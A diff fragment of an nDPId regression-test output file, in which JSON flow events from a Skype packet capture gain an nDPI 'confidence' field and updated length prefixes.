 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714398,"flow_last_seen":1431969733216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969721954,"flow_last_seen":1431969748263,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -1399,39 +1398,39 @@
 00630{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1431969715510,"flow_last_seen":1431969755612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2898,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1431969718289,"flow_last_seen":1431969752365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1431969718289,"flow_last_seen":1431969752365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1431969648258,"flow_last_seen":1431969808391,"flow_idle_time":180000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":26161,"flow_avg_l4_payload_len":331,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1431969648258,"flow_last_seen":1431969808391,"flow_idle_time":180000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":26161,"flow_avg_l4_payload_len":331,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969783628,"flow_last_seen":1431969808684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969783628,"flow_last_seen":1431969808684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969784741,"flow_last_seen":1431969808951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969784741,"flow_last_seen":1431969808951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969789490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969789490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00630{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1431969771806,"flow_last_seen":1431969808100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2836,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969698797,"flow_last_seen":1431969718921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":1336,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642337,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
